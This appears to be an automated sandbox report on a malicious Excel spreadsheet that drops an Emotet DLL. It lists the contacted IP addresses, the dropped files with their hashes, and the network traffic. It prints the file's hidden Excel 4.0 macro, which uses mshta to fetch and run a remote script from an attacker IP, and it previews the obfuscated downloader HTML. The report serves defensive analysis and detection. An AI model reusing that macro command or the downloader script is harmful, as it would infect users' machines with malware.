                                    		131717IDNIC-CIFO-AS-IDPTCitraJelajahInformatikaIDtrue
                                    51.15.4.22
                                    		unknownFrance
                                    		12876OnlineSASFRtrue
                                    159.89.230.105
                                    		unknownUnited States
                                    		14061DIGITALOCEAN-ASNUStrue
                                    162.214.50.39
                                    		unknownUnited States
                                    		46606UNIFIEDLAYER-AS-1UStrue
                                    103.206.244.105
                                    		jurnalpjf.lan.go.idIndonesia
                                    		131111CEPATNET-AS-IDPTMoraTelematikaIndonesiaIDfalse
                                    200.17.134.35
                                    		unknownBrazil
                                    		1916AssociacaoRedeNacionaldeEnsinoePesquisaBRtrue
                                    217.182.143.207
                                    		unknownFrance
                                    		16276OVHFRtrue
                                    107.182.225.142
                                    		unknownUnited States
                                    		32780HOSTINGSERVICES-INCUStrue
                                    51.38.71.0
                                    		unknownFrance
                                    		16276OVHFRtrue
                                    45.118.135.203
                                    		unknownJapan63949LINODE-APLinodeLLCUStrue
                                    50.116.54.215
                                    		unknownUnited States
                                    		63949LINODE-APLinodeLLCUStrue
                                    131.100.24.231
                                    		unknownBrazil
                                    		61635GOPLEXTELECOMUNICACOESEINTERNETLTDA-MEBRtrue
                                    46.55.222.11
                                    		unknownBulgaria
                                    		34841BALCHIKNETBGtrue
                                    41.76.108.46
                                    		unknownSouth Africa
                                    		327979DIAMATRIXZAtrue
                                    173.212.193.249
                                    		unknownGermany
                                    		51167CONTABODEtrue
                                    45.176.232.124
                                    		unknownColombia
                                    		267869CABLEYTELECOMUNICACIONESDECOLOMBIASASCABLETELCOCtrue
                                    178.79.147.66
                                    		unknownUnited Kingdom
                                    		63949LINODE-APLinodeLLCUStrue
                                    212.237.5.209
                                    		unknownItaly
                                    		31034ARUBA-ASNITtrue
                                    162.243.175.63
                                    		unknownUnited States
                                    		14061DIGITALOCEAN-ASNUStrue
                                    176.104.106.96
                                    		unknownSerbia
                                    		198371NINETRStrue
                                    207.38.84.195
                                    		unknownUnited States
                                    		30083AS-30083-GO-DADDY-COM-LLCUStrue
                                    164.68.99.3
                                    		unknownGermany
                                    		51167CONTABODEtrue
                                    164.90.147.135
                                    		hostfeeling.comUnited States
                                    		14061DIGITALOCEAN-ASNUStrue
                                    192.254.71.210
                                    		unknownUnited States
                                    		64235BIGBRAINUStrue
                                    212.237.56.116
                                    		unknownItaly
                                    		31034ARUBA-ASNITtrue
                                    104.168.155.129
                                    		unknownUnited States
                                    		54290HOSTWINDSUStrue
                                    45.142.114.231
                                    		unknownGermany
                                    		44066DE-FIRSTCOLOwwwfirst-colonetDEtrue
                                    203.114.109.124
                                    		unknownThailand
                                    		131293TOT-LLI-AS-APTOTPublicCompanyLimitedTHtrue
                                    209.59.138.75
                                    		unknownUnited States
                                    		32244LIQUIDWEBUStrue
                                    159.8.59.82
                                    		unknownUnited States
                                    		36351SOFTLAYERUStrue
                                    129.232.188.93
                                    		unknownSouth Africa
                                    		37153xneeloZAtrue
                                    91.240.118.172
                                    		unknownunknown
                                    		49453GLOBALLAYERNLtrue
                                    58.227.42.236
                                    		unknownKorea Republic of
                                    		9318SKB-ASSKBroadbandCoLtdKRtrue
                                    158.69.222.101
                                    		unknownCanada
                                    		16276OVHFRtrue
                                    104.251.214.46
                                    		unknownUnited States
                                    		54540INCERO-HVVCUStrue

                                    General Information

                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                    Analysis ID:562418
                                    Start date:28.01.2022
                                    Start time:21:17:27
                                    Joe Sandbox Product:CloudBasic
                                    Overall analysis duration:0h 12m 8s
                                    Hypervisor based Inspection enabled:false
                                    Report type:light
                                    Sample file name:CJ68000754184.xls
                                    Cookbook file name:defaultwindowsofficecookbook.jbs
                                    Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                    Number of analysed new started processes analysed:16
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • HDC enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Detection:MAL
                                    Classification:mal100.troj.expl.evad.winXLS@21/9@2/48
                                    EGA Information:
                                    • Successful, ratio: 75%
                                    HDC Information:
                                    • Successful, ratio: 18.4% (good quality ratio 15.8%)
                                    • Quality average: 66.5%
                                    • Quality standard deviation: 32.2%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 0
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Adjust boot time
                                    • Enable AMSI
                                    • Found application associated with file extension: .xls
                                    • Changed system and user locale, location and keyboard layout to English - United States
                                    • Found Word or Excel or PowerPoint or XPS Viewer
                                    • Attach to Office via COM
                                    • Scroll down
                                    • Close Viewer

                                    Warnings

                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe
                                    • TCP Packets have been reduced to 100
                                    • Execution Graph export aborted for target mshta.exe, PID 2812 because there are no executed function
                                    • Execution Graph export aborted for target powershell.exe, PID 2408 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                    Simulations

                                    Behavior and APIs

                                    TimeTypeDescription
                                    21:18:22API Interceptor61x Sleep call for process: mshta.exe modified
                                    21:18:25API Interceptor442x Sleep call for process: powershell.exe modified
                                    21:19:08API Interceptor70x Sleep call for process: rundll32.exe modified

                                    Joe Sandbox View / Context

                                    IPs

                                    No context

                                    Domains

                                    No context

                                    ASNs

                                    No context

                                    JA3 Fingerprints

                                    No context

                                    Dropped Files

                                    No context

                                    Created / dropped Files

                                    C:\ProgramData\JooSee.dll

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):548864
                                    Entropy (8bit):6.980517956334168
                                    Encrypted:false
                                    SSDEEP:12288:B2AavzUBPSczbeeTLjvWyMwWd3DYr6i64/:OUBPSczbeeTnvqZDWA
                                    MD5:74D1C2A27C684005BDFCE89A1A5618B4
                                    SHA1:033C28F6D209BA26560E472FEA70DDF740435EA0
                                    SHA-256:34347D89E1A340EDC48F050CDDD15CB1E3B1702932887AEA3D97D0D0BFFE4DE8
                                    SHA-512:E0A9010A2AAB912D48672F0DBD30E65664CAE4DA12B4E5444FB5AD8262E4099FFD08E15113871B3EA76EFA07F2F307319ACD699CE49F83CDF2C7734EBDE360A2
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: C:\ProgramData\JooSee.dll, Author: Joe Security
                                    Antivirus:
                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fe[1].htm

                                    Download File
                                    Process:C:\Windows\System32\mshta.exe
                                    File Type:data
                                    Category:downloaded
                                    Size (bytes):11054
                                    Entropy (8bit):6.200485074224619
                                    Encrypted:false
                                    SSDEEP:192:aY5CkQ90FfYdjqQa2XdytMHsygv2nscEYD63lWAG7orUzAaENQaCBlm1Zhvkz29c:aY4kBBOjqQrXdHHsyg8sCr0UznQQasYS
                                    MD5:DD20B97330028BCB6BF98D97C47028D9
                                    SHA1:D58D97589A97FBD3B1216ED76C4918113F4B7B25
                                    SHA-256:4E945D89F45065FBA3B3318DD8CB3EFF9991CB6F8038168D221B862810E84D21
                                    SHA-512:AF4979B61257330E763B0C450575859D678F6950EF42783C87B2D9ED84130E4651CF58FBEF40E4C0BD3217B957A807337475F85C2610C24317C05DE98AC31A88
                                    Malicious:false
                                    IE Cache URL:http://91.240.118.172/gg/ff/fe.html
                                    Preview:.......................................................................................................................................................................<html><head><meta http-equiv='x-ua-compatible' content='EmulateIE9'><script>l1l=document.documentMode||document.all;var f9f76c=true;ll1=document.layers;lll=window.sidebar;f9f76c=(!(l1l&&ll1)&&!(!l1l&&!ll1&&!lll));l_ll=location+'';l11=navigator.userAgent.toLowerCase();function lI1(l1I){return l11.indexOf(l1I)>0?true:false};lII=lI1('kht')|lI1('per');f9f76c|=lII;zLP=location.protocol+'0FD';mY2KcI8HWQPA8=new Array();q52Li668M68pR=new Array();q52Li668M68pR[0]='%6D\170%38%38%33%34%34%41' ;mY2KcI8HWQPA8[0]='.<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C~..D.T.D. .X.H.T.M.L. .1...0. .T.r.a.n.s.i.t.i.o.n.a.l~..E.N."~.~\n.t.p.:~..w~B...w.3...o.r.g./.T.R./.x~\n~..1./~..D~N~P.l.1.-.t~-~/~1~3~5.l...d.t.d.".>.<~W. .x~.~/.=."~=~?~A~C~E~G~I./.1.9~y~V~..l~f~h.e.a.d~g.s.c.r.i.p.t.>.e.v~6.(.u.n.e}..a.p.e.(.\'}..\\.1.6.2.%.2.0}

                                    C:\Users\user\AppData\Local\Temp\476C.tmp

                                    Download File
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:Composite Document File V2 Document, Cannot read section info
                                    Category:dropped
                                    Size (bytes):1536
                                    Entropy (8bit):1.1464700112623651
                                    Encrypted:false
                                    SSDEEP:3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X
                                    MD5:72F5C05B7EA8DD6059BF59F50B22DF33
                                    SHA1:D5AF52E129E15E3A34772806F6C5FBF132E7408E
                                    SHA-256:1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
                                    SHA-512:6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E
                                    Malicious:false
                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\~DFBED7E8D1868A8AC5.TMP

                                    Download File
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):28672
                                    Entropy (8bit):3.5189161831469296
                                    Encrypted:false
                                    SSDEEP:768:wvsk3hbdlylKsgqopeJBWhZFGkE+cMLxAAIZNSEVLG:w0k3hbdlylKsgqopeJBWhZFGkE+cMLx3
                                    MD5:06A30014EFAE12913C829BE85DD271EC
                                    SHA1:D19ADB2B308E5BC2C3E102DA72B2C22ADAF7563D
                                    SHA-256:2ACF233FC4C70929CE7081E3F9C544AD26656E9AC8BC64B25AA9B0CCCABA05C9
                                    SHA-512:E8BBC35960CC00962E744169521B702DD3C0B35BC248D4E3968DDCA9585BF21D0B43169F34EED7DF06426B4995E61653F5DD0F882F6F058FB6A010D708B0D279
                                    Malicious:false
                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Local\Temp\~DFD084F18BE955AE17.TMP

                                    Download File
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):512
                                    Entropy (8bit):0.0
                                    Encrypted:false
                                    SSDEEP:3::
                                    MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                    SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                    SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                    SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                    Malicious:false
                                    Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8016
                                    Entropy (8bit):3.5771325831414917
                                    Encrypted:false
                                    SSDEEP:96:chQCcMqAqvsqvJCwoqz8hQCcMqAqvsEHyqvJCworAzIuYtHRUVh/lUV0A2:cidoqz8iFHnorAzI1UVhHA2
                                    MD5:739473D4AA0429FF1319C5EB227EAAD3
                                    SHA1:CA575798F0BD07E2CD11E918FE367D6E716CAF54
                                    SHA-256:01ACBA9C38F360BBE15FA5B86E5C313A206BF0E68230FF1E40598E5144547DD2
                                    SHA-512:EB20B6E62892E550C89B0117D5689DC093DEB6B65C43366C399DD93E0AC78BF9F5578E43151CB34E9F4FD1D69B4D74C5E7DC25A1BC4B6438EFC84F55273C495C
                                    Malicious:false
                                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                    C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9HHY8DPM6GW1G0VNKTXL.temp

                                    Download File
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):8016
                                    Entropy (8bit):3.5771325831414917
                                    Encrypted:false
                                    SSDEEP:96:chQCcMqAqvsqvJCwoqz8hQCcMqAqvsEHyqvJCworAzIuYtHRUVh/lUV0A2:cidoqz8iFHnorAzI1UVhHA2
                                    MD5:739473D4AA0429FF1319C5EB227EAAD3
                                    SHA1:CA575798F0BD07E2CD11E918FE367D6E716CAF54
                                    SHA-256:01ACBA9C38F360BBE15FA5B86E5C313A206BF0E68230FF1E40598E5144547DD2
                                    SHA-512:EB20B6E62892E550C89B0117D5689DC093DEB6B65C43366C399DD93E0AC78BF9F5578E43151CB34E9F4FD1D69B4D74C5E7DC25A1BC4B6438EFC84F55273C495C
                                    Malicious:false
                                    Preview:...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......S"...Programs..f.......:...S".*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.

                                    C:\Users\user\Desktop\CJ68000754184.xls

                                    Download File
                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
                                    Category:dropped
                                    Size (bytes):86528
                                    Entropy (8bit):7.100272352481004
                                    Encrypted:false
                                    SSDEEP:1536:g0k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIzSEV2NnX4Ia3gg5W8IuD7PoHsP7e30:g0k3hbdlylKsgqopeJBWhZFGkE+cMLx0
                                    MD5:2C1128D3E74CCABAC63488793B1F9FC1
                                    SHA1:44BEE61E3B69FA078FA3149A86EE14A6254F41AF
                                    SHA-256:D6C0FE94AE6A74F54312237003CEF973E0874FC637312DF0E199207015D947B4
                                    SHA-512:834D97F729ACF6F20ED523935BE80B4F94371B1E1CC1629ACFCDF2D0519217D67B2B38FFFD0383EBF8C0F6F837A044C97FA4F8C11E2F45B713132C98CCD56479
                                    Malicious:true
                                    Yara Hits:
                                    • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\CJ68000754184.xls, Author: John Lambert @JohnLaTwC
                                    • Rule: JoeSecurity_XlsWithMacro4, Description: Yara detected Xls With Macro 4.0, Source: C:\Users\user\Desktop\CJ68000754184.xls, Author: Joe Security
                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=...........................................=........p.08.......X.@...........".......................1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1................<..C.a.l.i.b.r.i.1.*.h...6........<..C.a.l.i.b.r.i. .L.i.g.h.t.1.

                                    C:\Windows\SysWOW64\Jssipnq\wpnzacwyitgbmx.rxn (copy)

                                    Download File
                                    Process:C:\Windows\SysWOW64\rundll32.exe
                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):548864
                                    Entropy (8bit):6.980517956334168
                                    Encrypted:false
                                    SSDEEP:12288:B2AavzUBPSczbeeTLjvWyMwWd3DYr6i64/:OUBPSczbeeTnvqZDWA
                                    MD5:74D1C2A27C684005BDFCE89A1A5618B4
                                    SHA1:033C28F6D209BA26560E472FEA70DDF740435EA0
                                    SHA-256:34347D89E1A340EDC48F050CDDD15CB1E3B1702932887AEA3D97D0D0BFFE4DE8
                                    SHA-512:E0A9010A2AAB912D48672F0DBD30E65664CAE4DA12B4E5444FB5AD8262E4099FFD08E15113871B3EA76EFA07F2F307319ACD699CE49F83CDF2C7734EBDE360A2
                                    Malicious:false
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......hs.a,..2,..2,..2...2&..2...27..2,..2...2...26..2...2...2...2...2...2-..2...2-..2...2-..2Rich,..2................PE..L...>..a...........!.....P...................`......................................................................@-..R...4...........PV......................0N......................................@............`..........@....................text...9E.......P.................. ..`.rdata.......`.......`..............@..@.data....e...0...0...0..............@....rsrc...PV.......`...`..............@..@.reloc..b...........................@..B........................................................................................................................................................................................................................................................................................................................

                                    Static File Info

                                    General

                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Thu Jan 27 23:41:00 2022, Last Saved Time/Date: Fri Jan 28 06:31:03 2022, Security: 0
                                    Entropy (8bit):7.044070003028746
                                    TrID:
                                    • Microsoft Excel sheet (30009/1) 78.94%
                                    • Generic OLE2 / Multistream Compound File (8008/1) 21.06%
                                    File name:CJ68000754184.xls
                                    File size:87565
                                    MD5:84edef677d286111cb0ef9d53e0d51df
                                    SHA1:19548ae67f6ffec8a1c2cb9b768cb1e64d29dbcb
                                    SHA256:081b5ea7f6d4ce96c9c97811785f86a68809a51eaadba0928406f562ec8ea58a
                                    SHA512:3fa012d744b2c065aaed9aa425f88f367b914dcd4f57e902cb6c96493872d12a13f7fdc4c476bf7319c36c0d555be84df8bb4594e4323cc1c51ef0853f8e59fe
                                    SSDEEP:1536:H0k3hbdlylKsgqopeJBWhZFGkE+cMLxAAIzSEV2NnX4Ia3gg5W8IuD7PoHsP7e3/:H0k3hbdlylKsgqopeJBWhZFGkE+cMLxz
                                    File Content Preview:........................>......................................................................................................................................................................................................................................

                                    File Icon

                                    Icon Hash:e4eea286a4b4bcb4

                                    Static OLE Info

                                    General

                                    Document Type:OLE
                                    Number of OLE Files:1

                                    OLE File "CJ68000754184.xls"

                                    Indicators
                                    Has Summary Info:True
                                    Application Name:Microsoft Excel
                                    Encrypted Document:False
                                    Contains Word Document Stream:False
                                    Contains Workbook/Book Stream:True
                                    Contains PowerPoint Document Stream:False
                                    Contains Visio Document Stream:False
                                    Contains ObjectPool Stream:
                                    Flash Objects Count:
                                    Contains VBA Macros:True
                                    Summary
                                    Code Page:1251
                                    Author:xXx
                                    Last Saved By:xXx
                                    Create Time:2022-01-27 23:41:00
                                    Last Saved Time:2022-01-28 06:31:03
                                    Creating Application:Microsoft Excel
                                    Security:0
                                    Document Summary
                                    Document Code Page:1251
                                    Thumbnail Scaling Desired:False
                                    Company:
                                    Contains Dirty Links:False
                                    Shared Document:False
                                    Changed Hyperlinks:False
                                    Application Version:1048576

                                    Streams

                                    Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                    General
                                    Stream Path:\x5DocumentSummaryInformation
                                    File Type:data
                                    Stream Size:4096
                                    Entropy:0.324918127833
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . R E E E E E E E E . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 f4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 ad 00 00 00
                                    Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096
                                    General
                                    Stream Path:\x5SummaryInformation
                                    File Type:data
                                    Stream Size:4096
                                    Entropy:0.263079431268
                                    Base64 Encoded:False
                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x X x . . . . . . . . . x X x . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . N . V . . . . @ . . . . - - . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                    Data Raw:fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e3 04 00 00 1e 00 00 00 04 00 00 00
                                    Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 76002
                                    General
                                    Stream Path:Workbook
                                    File Type:Applesoft BASIC program data, first line number 16
                                    Stream Size:76002
                                    Entropy:7.62172227998
                                    Base64 Encoded:True
                                    Data ASCII:. . . . . . . . Z O . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . x X x B . . . . . a . . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . p . 0 8 . . . . . . . X . @ . . . . . . . . . . . " . . . . . . . . .
                                    Data Raw:09 08 10 00 00 06 05 00 5a 4f cd 07 c9 00 02 00 06 08 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 03 00 00 78 58 78 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

                                    Macro 4.0 Code

                                    Name:REEEEEEEE
                                    Type:3
                                    Final:False
                                    Visible:False
                                    Protected:False
                                                      REEEEEEEE
                  3
                  False
                  0
                  False
                  post
                  2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html")5,2,=HALT()
                                    Name:REEEEEEEE
                                    Type:3
                                    Final:False
                                    Visible:False
                                    Protected:False
                                                      REEEEEEEE
                  3
                  False
                  0
                  False
                  pre
                  2,2,=EXEC("CMD.EXE /c mshta http://91.240.118.172/gg/ff/fe.html")5,2,=HALT()

                                    Network Behavior

                                    Snort IDS Alerts

                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                    01/28/22-21:18:27.714526TCP2034631ET TROJAN Maldoc Activity (set)4916880192.168.2.2291.240.118.172

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Jan 28, 2022 21:18:21.824399948 CET4916780192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:18:21.885463953 CET804916791.240.118.172192.168.2.22
                                    Jan 28, 2022 21:18:21.885570049 CET4916780192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:18:21.887382984 CET4916780192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:18:21.948643923 CET804916791.240.118.172192.168.2.22
                                    Jan 28, 2022 21:18:21.949342966 CET804916791.240.118.172192.168.2.22
                                    Jan 28, 2022 21:18:21.949457884 CET804916791.240.118.172192.168.2.22
                                    Jan 28, 2022 21:18:21.949491978 CET4916780192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:18:21.949515104 CET4916780192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:18:21.949542046 CET804916791.240.118.172192.168.2.22
                                    Jan 28, 2022 21:18:21.949568033 CET804916791.240.118.172192.168.2.22
                                    Jan 28, 2022 21:18:21.949590921 CET804916791.240.118.172192.168.2.22
                                    Jan 28, 2022 21:18:21.949603081 CET4916780192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:18:21.949625015 CET804916791.240.118.172192.168.2.22
                                    Jan 28, 2022 21:18:21.949637890 CET4916780192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:18:21.949660063 CET4916780192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:18:21.949666977 CET4916780192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:18:21.949677944 CET804916791.240.118.172192.168.2.22
                                    Jan 28, 2022 21:18:21.949698925 CET804916791.240.118.172192.168.2.22
                                    Jan 28, 2022 21:18:21.949717999 CET804916791.240.118.172192.168.2.22
                                    Jan 28, 2022 21:18:21.949734926 CET804916791.240.118.172192.168.2.22
                                    Jan 28, 2022 21:18:21.949753046 CET4916780192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:18:21.949765921 CET4916780192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:18:21.949769974 CET4916780192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:18:21.949784994 CET4916780192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:18:21.956779957 CET4916780192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:18:27.648180008 CET4916880192.168.2.2291.240.118.172
                                    Jan 28, 2022 21:18:27.709604979 CET804916891.240.118.172192.168.2.22
                                    Jan 28, 2022 21:18:27.710990906 CET4916880192.168.2.2291.240.118.172
